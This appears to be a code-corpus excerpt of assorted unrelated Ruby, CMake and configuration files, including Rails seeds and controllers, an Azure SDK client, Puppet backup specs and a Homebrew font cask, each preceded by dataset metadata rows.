#-----------------------------------------------------------------------------
SET (HDF4_LIB_CORENAME "hdf4")
-SET (HDF4_SRC_LIB_CORENAME "hdf")
+SET (HDF4_SRC_LIB_CORENAME "df")
SET (HDF4_SRC_FCSTUB_LIB_CORENAME "hdf_fcstub")
SET (HDF4_SRC_FORTRAN_LIB_CORENAME "hdf_fortran")
SET (HDF4_MF_LIB_CORENAME "mfhdf")
| 31.658537 | 89 | 0.67604 |
7948995ba6170f212af650499b890b9a2f420589 | 4,086 | # This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
require 'database_cleaner/active_record'
DatabaseCleaner.strategy = :truncation
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
config.before(:suite) do
DatabaseCleaner.clean
end
config.expect_with :rspec do |expectations|
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
config.mock_with :rspec do |mocks|
mocks.verify_partial_doubles = true
end
config.default_formatter = "doc"
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# This allows you to limit a spec run to individual examples or groups
# you care about by tagging them with `:focus` metadata. When nothing
# is tagged with `:focus`, all examples get run. RSpec also provides
# aliases for `it`, `describe`, and `context` that include `:focus`
# metadata: `fit`, `fdescribe` and `fcontext`, respectively.
config.filter_run_when_matching :focus
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = "doc"
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 44.413043 | 92 | 0.755262 |
5daeb2f445d8cc2e3e57c6691123e517973bad55 | 3,020 | # frozen_string_literal: true
module TwelvedataRuby
class Error < StandardError
DEFAULT_MSGS = {
"EndpointError" => "Endpoint is not valid. %{invalid}",
"EndpointNameError" => "`%{invalid}` is not a correct endpoint. Valid values are: `%{valid_names}`",
"EndpointParametersKeysError" => "Invalid parameters found: `%{invalid}`. Valid parameters for `%{name}` "\
"endpoint are: `%{parameters}`. Please see: `Twelvedata::Endpoint#parameters` for more details",
"EndpointRequiredParametersError" => "Missing values for required parameters: `%{invalid}`. "\
"`%{name}` endpoint required parameters are: `%{required}`.",
"ResponseError" => "Encountered an error from the response"
}.freeze
attr_reader :attrs
def initialize(args={})
@attrs = args[:attrs] || {}
super((args[:message] || DEFAULT_MSGS[Utils.demodulize(self.class)]) % @attrs)
end
end
class EndpointError < Error
def initialize(**args)
endpoint = args[:endpoint]
super(
attrs: {
name: endpoint.name,
invalid: args[:invalid],
valid_names: endpoint.class.names.join(", "),
parameters: endpoint&.parameters_keys&.send(:join, ", "),
required: endpoint&.required_parameters&.send(:join, ", ")
}
)
end
end
class EndpointNameError < EndpointError; end
class EndpointParametersKeysError < EndpointError; end
class EndpointRequiredParametersError < EndpointError; end
class ResponseError < Error
API_ERROR_CODES_MAP = {
400 => "BadRequestResponseError",
401 => "UnauthorizedResponseError",
403 => "ForbiddenResponseError",
404 => "NotFoundResponseError",
414 => "ParameterTooLongResponseError",
429 => "TooManyRequestsResponseError",
500 => "InternalServerResponseError"
}.freeze
HTTP_ERROR_CODES_MAP = {
404 => "PageNotFoundResponseError",
}.freeze
def self.error_code_klass(code, error_type=:api)
error_type = :api unless %i[api http].member?(error_type)
TwelvedataRuby::ResponseError.const_get("#{error_type.upcase}_ERROR_CODES_MAP")[code]
end
attr_reader :json, :code, :request
def initialize(json:, request:, attrs: nil, message: nil, code: nil)
@json = json.is_a?(Hash) ? json : {}
@code = code || @json[:code]
@attrs = attrs || {}
@request = request
super(attrs: @attrs, message: "#{@json[:message] || message}")
end
end
class BadRequestResponseError < ResponseError; end
class UnauthorizedResponseError < ResponseError; end
class ForbiddenResponseError < ResponseError; end
class NotFoundResponseError < ResponseError; end
class PageNotFoundResponseError < ResponseError; end
class ParameterTooLongResponseError < ResponseError; end
class TooManyRequestsResponseError < ResponseError; end
class InternalServerResponseErro < ResponseError; end
end
| 33.186813 | 135 | 0.657285 |
33e6c4dbf2c96b1650e572146b887c13b7279124 | 153 | # frozen_string_literal: true
RSpec.describe EtdaUtilities do
it "has a version number" do
expect(EtdaUtilities::VERSION).not_to be nil
end
end
| 19.125 | 48 | 0.764706 |
bbba61557acdfbc4d398c50b4d5f00a3386bf724 | 320 | # frozen_string_literal: true
require "active_support"
require "active_support/core_ext"
require "active_model"
require "dfe_wizard/version"
require "dfe_wizard/store"
require "dfe_wizard/step"
require "dfe_wizard/base"
require "dfe_wizard/controller"
require "dfe_wizard/issue_verification_code"
module DFEWizard
end
| 21.333333 | 44 | 0.834375 |
4af2a2ac4896fa84d364be9bde93d12e8b170830 | 6,366 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::NetApp::Mgmt::V2019_10_01
#
# Microsoft NetApp Azure Resource Provider specification
#
class MountTargets
include MsRestAzure
#
# Creates and initializes a new instance of the MountTargets class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [AzureNetAppFilesManagementClient] reference to the AzureNetAppFilesManagementClient
attr_reader :client
#
# Describe all mount targets
#
# List all mount targets associated with the volume
#
# @param resource_group_name [String] The name of the resource group.
# @param account_name [String] The name of the NetApp account
# @param pool_name [String] The name of the capacity pool
# @param volume_name [String] The name of the volume
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MountTargetList] operation results.
#
def list(resource_group_name, account_name, pool_name, volume_name, custom_headers:nil)
response = list_async(resource_group_name, account_name, pool_name, volume_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Describe all mount targets
#
# List all mount targets associated with the volume
#
# @param resource_group_name [String] The name of the resource group.
# @param account_name [String] The name of the NetApp account
# @param pool_name [String] The name of the capacity pool
# @param volume_name [String] The name of the volume
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(resource_group_name, account_name, pool_name, volume_name, custom_headers:nil)
list_async(resource_group_name, account_name, pool_name, volume_name, custom_headers:custom_headers).value!
end
#
# Describe all mount targets
#
# List all mount targets associated with the volume
#
# @param resource_group_name [String] The name of the resource group.
# @param account_name [String] The name of the NetApp account
# @param pool_name [String] The name of the capacity pool
# @param volume_name [String] The name of the volume
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(resource_group_name, account_name, pool_name, volume_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, 'pool_name is nil' if pool_name.nil?
fail ArgumentError, 'volume_name is nil' if volume_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.NetApp/netAppAccounts/{accountName}/capacityPools/{poolName}/volumes/{volumeName}/mountTargets'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'poolName' => pool_name,'volumeName' => volume_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::NetApp::Mgmt::V2019_10_01::Models::MountTargetList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
end
end
| 46.808824 | 206 | 0.707823 |
ac8953c3251ebf5039dae07505a7504bb9a70e9c | 1,534 | # -*- encoding: utf-8 -*-
# stub: crass 1.0.6 ruby lib
Gem::Specification.new do |s|
s.name = "crass".freeze
s.version = "1.0.6"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "bug_tracker_uri" => "https://github.com/rgrove/crass/issues", "changelog_uri" => "https://github.com/rgrove/crass/blob/v1.0.6/HISTORY.md", "documentation_uri" => "https://www.rubydoc.info/gems/crass/1.0.6", "source_code_uri" => "https://github.com/rgrove/crass/tree/v1.0.6" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Ryan Grove".freeze]
s.date = "2020-01-12"
s.description = "Crass is a pure Ruby CSS parser based on the CSS Syntax Level 3 spec.".freeze
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/rgrove/crass/".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 1.9.2".freeze)
s.rubygems_version = "3.2.3".freeze
s.summary = "CSS parser based on the CSS Syntax Level 3 spec.".freeze
s.installed_by_version = "3.2.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<minitest>.freeze, ["~> 5.0.8"])
s.add_development_dependency(%q<rake>.freeze, ["~> 10.1.0"])
else
s.add_dependency(%q<minitest>.freeze, ["~> 5.0.8"])
s.add_dependency(%q<rake>.freeze, ["~> 10.1.0"])
end
end
| 43.828571 | 321 | 0.687093 |
873731cae5e98db78e039cbe186ddfa226e670f0 | 3,133 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
require 'factory_girl_rails'
require 'faker'
# страны с городами
FactoryGirl.create_list(:country_with_cities, 5)
# пользователи
FactoryGirl.create_list(:user, 20, max_city_id: 25)
# с дополнительными email'ами
FactoryGirl.create_list(:user_with_emails, 15, max_city_id: 25, domen: "test.ru")
FactoryGirl.create_list(:user_with_emails, 15, max_city_id: 25, domen: "mail.ru")
FactoryGirl.create_list(:user_with_emails, 15, max_city_id: 25, domen: "samsung.com")
# категории
FactoryGirl.create_list(:category, 7)
# теги и технологии
FactoryGirl.create_list(:tag, 30)
FactoryGirl.create_list(:technology, 30)
# проекты
FactoryGirl.create_list(:project_with_additions, 20, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30)
FactoryGirl.create_list(:project_with_additions, 20, :dev_finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30)
FactoryGirl.create_list(:project_with_additions, 20, :finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30)
# с подтверждениями
FactoryGirl.create_list(:project_with_confirms, 20, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65)
FactoryGirl.create_list(:project_with_confirms, 20, :dev_finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65)
FactoryGirl.create_list(:project_with_confirms, 20, :finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65)
# с участниками проектов
FactoryGirl.create_list(:project_with_confirms, 30, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65,
max_excuters_count: 10, max_excuter_id: 65)
FactoryGirl.create_list(:project_with_confirms, 30, :dev_finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65,
max_excuters_count: 10, max_excuter_id: 65)
FactoryGirl.create_list(:project_with_confirms, 30, :finished, max_creater_id: 65, max_category_id: 7, max_tag_id: 30, max_tech_id: 30, max_confirm_count: 10, max_confirmer_id: 65,
max_excuters_count: 10, max_excuter_id: 65)
# организации
testAdmin = User.find(rand(21..35));
FactoryGirl.create(:organization, creater_id: testAdmin.id, admin_email: testAdmin.email, domen_name: "test.ru")
mailAdmin = User.find(rand(36..50));
FactoryGirl.create(:organization, creater_id: mailAdmin.id, admin_email: mailAdmin.email, domen_name: "mail.ru")
samsungAdmin = User.find(rand(51..65));
FactoryGirl.create(:organization, creater_id: samsungAdmin.id, admin_email: samsungAdmin.email, domen_name: "samsung.com")
| 55.946429 | 184 | 0.789658 |
4ac1ea8c0565cfdbe5e7defcb3a1021d88881f7a | 1,501 | class UserTeeTimesController < ApplicationController
def create
@user_tee_time = UserTeeTime.new
authorize @user_tee_time
@tee_time = TeeTime.find_by_id(params[:user_tee_time][:tee_time_id])
@user = User.find_by_id(params[:user_tee_time][:user_id])
if @tee_time.add_user(@user)
render json: @tee_time.user_tee_times.last
else
flash[:warning] = @tee_time.user_tee_times.last.errors.full_messages.first
redirect_to tee_time_path(@tee_time)
end
end
def update
@user_tee_time = UserTeeTime.find_by_id(params[:id])
authorize @user_tee_time
params[:operation] == '1' ? @user_tee_time.add_guest : @user_tee_time.remove_guest
if (params[:operation] == '1' || params[:operation] == '-1') && @user_tee_time.save
render json: UserTeeTime.find_by_id(params[:id])
else
flash[:confirmation] = "Uh oh, something went wrong"
redirect_to tee_time_path(@user_tee_time.tee_time)
end
end
def destroy
@user_tee_time = UserTeeTime.find_by_id(params[:id])
authorize @user_tee_time
tee_time = @user_tee_time.tee_time
@user_tee_time.destroy
if tee_time.users.empty?
flash[:confirmation] = "Successfully left and deleted Tee Time"
tee_time.comments.destroy_all
tee_time.destroy
redirect_to user_path(current_user)
else
render json: tee_time
end
end
private
def user_tee_time_params
params.require(:user_tee_time).permit(:tee_time_id, :user_id)
end
end
| 29.431373 | 87 | 0.711526 |
1ccf3fc58503851d6b6af400589496c3219ea483 | 13,653 | require 'spec_helper'
describe 'automysqlbackup::backup' do
let :default_params do
{
:cron_script => false,
:backup_dir => '/backup',
:etc_dir => '/usr/local/etc'
}
end
context 'on supported operating systems' do
['Debian', 'RedHat'].each do |osfamily|
describe "with all params on defaults #{osfamily}" do
let(:title) { 'db1' }
let(:params) {{ }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'include automysqlbackup' }
it 'should contain the automysqlbackup db config file' do
should contain_file('/etc/automysqlbackup/db1.conf').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0650',
})
end
it 'should create the cron job' do
should contain_file('/etc/cron.daily/db1-automysqlbackup').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
it 'should create the backup destination' do
should contain_file('/var/backup/db1').with({
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
end
describe "with dir params changed and cron disabled" do
let(:title) { 'db1' }
let :params do default_params end
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'include automysqlbackup' }
it 'should contain the automysqlbackup db config file' do
should contain_file('/usr/local/etc/db1.conf').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0650',
})
end
it 'should create the backup destination' do
should contain_file('/backup/db1').with({
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
it 'should not create cron job' do
should_not contain_file('/etc/cron.daily/db1-automysqlbackup')
end
end
describe "with amb class using non-default etc dir" do
let(:title) { 'db1' }
let(:params) {{ }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'class { "automysqlbackup": etc_dir => "/usr/local/etc/amb", } ' }
it 'should create the config file' do
should contain_file('/usr/local/etc/amb/db1.conf').with({
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0650',
})
end
end
describe "with amb class using non-default backup dir" do
let(:title) { 'db1' }
let(:params) {{ }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'class { "automysqlbackup": backup_dir => "/amb-backups", } ' }
it 'should create the config file' do
should contain_file('/amb-backups/db1').with({
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
})
end
end
describe "with string for array param" do
let(:title) { 'db1' }
let(:params) {{ :db_exclude => "stringval" }}
let(:facts) {{ :osfamily => osfamily }}
let(:pre_condition) { 'include automysqlbackup' }
it 'should throw an error' do
expect { should }.to raise_error(Puppet::Error, /is not an Array/)
end
end
end
end
describe 'config template items' do
let(:facts) {{
:osfamily => 'Debian',
:operatingsystemrelease => '6',
}}
let(:title) { 'db1' }
describe 'inheriting basic params' do
let :params do default_params end
end
# All match and notmatch should be a list of regexs and exact match strings
context ".conf content" do
[
{
:title => 'should contain backup_dir',
:attr => 'backup_dir',
:value => '/var/backup',
:match => [/CONFIG_backup_dir='\/var\/backup\/db1'/],
},
{
:title => 'should contain mysql_dump_username',
:attr => 'mysql_dump_username',
:value => 'mysqlroot',
:match => [/CONFIG_mysql_dump_username='mysqlroot'/],
},
{
:title => 'should contain mysql_dump_password',
:attr => 'mysql_dump_password',
:value => 'mysqlpass',
:match => [/CONFIG_mysql_dump_password='mysqlpass'/],
},
{
:title => 'should contain mysql_dump_host',
:attr => 'mysql_dump_host',
:value => '192.168.1.1',
:match => [/CONFIG_mysql_dump_host='192.168.1.1'/],
},
{
:title => 'should contain mysql_dump_port',
:attr => 'mysql_dump_port',
:value => '33306',
:match => [/CONFIG_mysql_dump_port='33306'/],
},
{
:title => 'should contain multicore',
:attr => 'multicore',
:value => 'yes',
:match => [/CONFIG_multicore='yes'/],
},
{
:title => 'should contain multicore_threads',
:attr => 'multicore_threads',
:value => '3',
:match => [/CONFIG_multicore_threads='3'/],
},
{
:title => 'should contain db_names',
:attr => 'db_names',
:value => ['test','prod_db'],
:match => [/CONFIG_db_names=\( 'test' 'prod_db' \)/],
},
{
:title => 'should contain db_month_names',
:attr => 'db_month_names',
:value => ['prod_db','prod_db2'],
:match => [/CONFIG_db_month_names=\( 'prod_db' 'prod_db2' \)/],
},
{
:title => 'should contain db_exclude',
:attr => 'db_exclude',
:value => ['dev_db','stage_db'],
:match => [/CONFIG_db_exclude=\( 'dev_db' 'stage_db' \)/],
},
{
:title => 'should contain table_exclude',
:attr => 'table_exclude',
:value => ['sessions','temp'],
:match => [/CONFIG_table_exclude=\( 'sessions' 'temp' \)/],
},
{
:title => 'should contain do_monthly',
:attr => 'do_monthly',
:value => '05',
:match => [/CONFIG_do_monthly='05'/],
},
{
:title => 'should contain do_weekly',
:attr => 'do_weekly',
:value => '2',
:match => [/CONFIG_do_weekly='2'/],
},
{
:title => 'should contain rotation_daily',
:attr => 'rotation_daily',
:value => '4',
:match => [/CONFIG_rotation_daily='4'/],
},
{
:title => 'should contain rotation_weekly',
:attr => 'rotation_weekly',
:value => '45',
:match => [/CONFIG_rotation_weekly='45'/],
},
{
:title => 'should contain rotation_monthly',
:attr => 'rotation_monthly',
:value => '230',
:match => [/CONFIG_rotation_monthly='230'/],
},
{
:title => 'should contain mysql_dump_commcomp',
:attr => 'mysql_dump_commcomp',
:value => 'value',
:match => [/CONFIG_mysql_dump_commcomp='value'/],
},
{
:title => 'should contain mysql_dump_usessl',
:attr => 'mysql_dump_usessl',
:value => 'yes',
:match => [/CONFIG_mysql_dump_usessl='yes'/],
},
{
:title => 'should contain mysql_dump_socket',
:attr => 'mysql_dump_socket',
:value => 'none.sock',
:match => [/CONFIG_mysql_dump_socket='none.sock'/],
},
{
:title => 'should contain mysql_dump_max_allowed_packet',
:attr => 'mysql_dump_max_allowed_packet',
:value => '400',
:match => [/CONFIG_mysql_dump_max_allowed_packet='400'/],
},
{
:title => 'should contain mysql_dump_buffer_size',
:attr => 'mysql_dump_buffer_size',
:value => '300',
:match => [/CONFIG_mysql_dump_buffer_size='300'/],
},
{
:title => 'should contain mysql_dump_single_transaction',
:attr => 'mysql_dump_single_transaction',
:value => 'yes',
:match => [/CONFIG_mysql_dump_single_transaction='yes'/],
},
{
:title => 'should contain mysql_dump_master_data',
:attr => 'mysql_dump_master_data',
:value => '1',
:match => [/CONFIG_mysql_dump_master_data='1'/],
},
{
:title => 'should contain mysql_dump_full_schema',
:attr => 'mysql_dump_full_schema',
:value => 'yes',
:match => [/CONFIG_mysql_dump_full_schema='yes'/],
},
{
:title => 'should contain mysql_dump_dbstatus',
:attr => 'mysql_dump_dbstatus',
:value => 'yes',
:match => [/CONFIG_mysql_dump_dbstatus='yes'/],
},
{
:title => 'should contain mysql_dump_create_database',
:attr => 'mysql_dump_create_database',
:value => 'yes',
:match => [/CONFIG_mysql_dump_create_database='yes'/],
},
{
:title => 'should contain mysql_dump_use_separate_dirs',
:attr => 'mysql_dump_use_separate_dirs',
:value => 'yes',
:match => [/CONFIG_mysql_dump_use_separate_dirs='yes'/],
},
{
:title => 'should contain mysql_dump_compression',
:attr => 'mysql_dump_compression',
:value => 'bzip2',
:match => [/CONFIG_mysql_dump_compression='bzip2'/],
},
{
:title => 'should contain mysql_dump_latest',
:attr => 'mysql_dump_latest',
:value => 'yes',
:match => [/CONFIG_mysql_dump_latest='yes'/],
},
{
:title => 'should contain mysql_dump_latest_clean_filenames',
:attr => 'mysql_dump_latest_clean_filenames',
:value => 'yes',
:match => [/CONFIG_mysql_dump_latest_clean_filenames='yes'/],
},
{
:title => 'should contain mysql_dump_differential',
:attr => 'mysql_dump_differential',
:value => 'yes',
:match => [/CONFIG_mysql_dump_differential='yes'/],
},
{
:title => 'should contain mailcontent',
:attr => 'mailcontent',
:value => 'nonegiven',
:match => [/CONFIG_mailcontent='nonegiven'/],
},
{
:title => 'should contain mail_maxattsize',
:attr => 'mail_maxattsize',
:value => '40',
:match => [/CONFIG_mail_maxattsize='40'/],
},
{
:title => 'should contain mail_splitandtar',
:attr => 'mail_splitandtar',
:value => 'no',
:match => [/CONFIG_mail_splitandtar='no'/],
},
{
:title => 'should contain mail_use_uuencoded_attachments',
:attr => 'mail_use_uuencoded_attachments',
:value => 'no',
:match => [/CONFIG_mail_use_uuencoded_attachments='no'/],
},
{
:title => 'should contain mail_address',
:attr => 'mail_address',
:value => '[email protected]',
:match => [/CONFIG_mail_address='[email protected]'/],
},
{
:title => 'should contain encrypt',
:attr => 'encrypt',
:value => 'yes',
:match => [/CONFIG_encrypt='yes'/],
},
{
:title => 'should contain encrypt_password',
:attr => 'encrypt_password',
:value => 'supersecret',
:match => [/CONFIG_encrypt_password='supersecret'/],
},
{
:title => 'should contain backup_local_files',
:attr => 'backup_local_files',
:value => ['/etc/motd','/etc/hosts'],
:match => [/CONFIG_backup_local_files=\( '\/etc\/motd' '\/etc\/hosts' \)/],
},
{
:title => 'should contain prebackup',
:attr => 'prebackup',
:value => '/usr/local/bin/myscript',
:match => [/CONFIG_prebackup='\/usr\/local\/bin\/myscript'/],
},
{
:title => 'should contain postbackup',
:attr => 'postbackup',
:value => '/usr/local/bin/myotherscript',
:match => [/CONFIG_postbackup='\/usr\/local\/bin\/myotherscript'/],
},
{
:title => 'should contain umask',
:attr => 'umask',
:value => '0020',
:match => [/CONFIG_umask='0020'/],
},
{
:title => 'should contain dryrun',
:attr => 'dryrun',
:value => 'no',
:match => [/CONFIG_dryrun='no'/],
}
].each do |param|
describe "when #{param[:attr]} is #{param[:value]}" do
let :params do default_params.merge({ param[:attr].to_sym => param[:value] }) end
it { should contain_file("#{params[:etc_dir]}/#{title}.conf").with_mode('0650') }
if param[:match]
it "#{param[:title]}: matches" do
param[:match].each do |match|
should contain_file("#{params[:etc_dir]}/#{title}.conf").with_content( match )
end
end
end
end
end
end
end
end | 34.652284 | 96 | 0.493591 |
38efe5b8fd55818cb6f72c30faf962d57e29bc48 | 341 | module Bankscrap
class Investment
include Utils::Inspectable
attr_accessor :bank, :id, :name, :balance, :currency, :investment
def initialize(params = {})
params.each { |key, value| send "#{key}=", value }
end
private
def inspect_attributes
%i[id name balance currency investment]
end
end
end
| 18.944444 | 69 | 0.651026 |
7afe83dca293f96dba9a245abc9e2ccbef7b72d0 | 614 | require 'beaker/hypervisor/vagrant'
class Beaker::VagrantParallels < Beaker::Vagrant
def provision(provider = 'parallels')
super
end
def self.provider_vfile_section(host, options)
provider_section = ""
provider_section << " v.vm.provider :parallels do |prl|\n"
provider_section << " prl.optimize_power_consumption = false\n"
provider_section << " prl.memory = '#{memsize(host,options)}'\n"
provider_section << " prl.update_guest_tools = false\n" if options[:prl_update_guest_tools] == 'disable'
provider_section << " end\n"
provider_section
end
end
| 32.315789 | 113 | 0.688925 |
e9110e6e72bbf6166bca2ce89d6717226a876e39 | 895 | # encoding: UTF-8
module Mutant
class Mutator
class Node
# Mutator for resbody nodes
class Resbody < self
handle(:resbody)
children :captures, :assignment, :block
private
# Emit mutations
#
# @return [undefined]
#
# @api private
#
def dispatch
emit_assignment(nil)
emit_block_mutations if block
mutate_captures
end
# Mutate captures
#
# @return [undefined]
#
# @api private
#
def mutate_captures
return unless captures
emit_captures(nil)
Util::Array.each(captures.children, self) do |matchers|
next if matchers.empty?
emit_captures(s(:array, *matchers))
end
end
end # Resbody
end # Node
end # Mutator
end # Mutant
| 19.456522 | 65 | 0.52514 |
f7f907b04a3f1869d3d1066432810ed8ebe6dda2 | 977 | # frozen_string_literal: true
# rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: taggings
#
# id :uuid not null, primary key
# created_at :datetime not null
# updated_at :datetime not null
# question_id :uuid not null
# tag_id(Can't set null false due to replication process) :uuid
#
# Indexes
#
# index_taggings_on_question_id (question_id)
# index_taggings_on_tag_id (tag_id)
#
# Foreign Keys
#
# taggings_question_id_fkey (question_id => questions.id) ON DELETE => restrict ON UPDATE => restrict
# taggings_tag_id_fkey (tag_id => tags.id) ON DELETE => restrict ON UPDATE => restrict
#
# rubocop:enable Metrics/LineLength
FactoryGirl.define do
factory :tagging do
question
tag
end
end
| 30.53125 | 103 | 0.559877 |
28ee92235357d13d5101e4e26ba47a38ce492d13 | 139 | class AddHideDefaultFieldsToSpaces < ActiveRecord::Migration
def change
add_column :spaces, :hide_default_fields, :boolean
end
end
| 23.166667 | 60 | 0.798561 |
eddd42ffcbac72546d98f22eaee5a6ed6fcff51b | 308 | cask 'font-nanummyeongjo-eco' do
version :latest
sha256 :no_check
url "http://appdown.naver.com/naver/font/NanumFont/setupmac/NanumFontSetup_MJECO_OTF_Ver1.0.app.zip"
name 'Nanummyeonjo Eco'
homepage 'https://hangeul.naver.com/2017/nanum'
app "NanumFontSetup_MJECO_OTF_Ver1.0.app"
end | 38.5 | 104 | 0.753247 |
d5aead7826ae80cad4635f42569eb39a97ff3495 | 16,042 | module Resque
# A Resque Worker processes jobs. On platforms that support fork(2),
# the worker will fork off a child to process each job. This ensures
# a clean slate when beginning the next job and cuts down on gradual
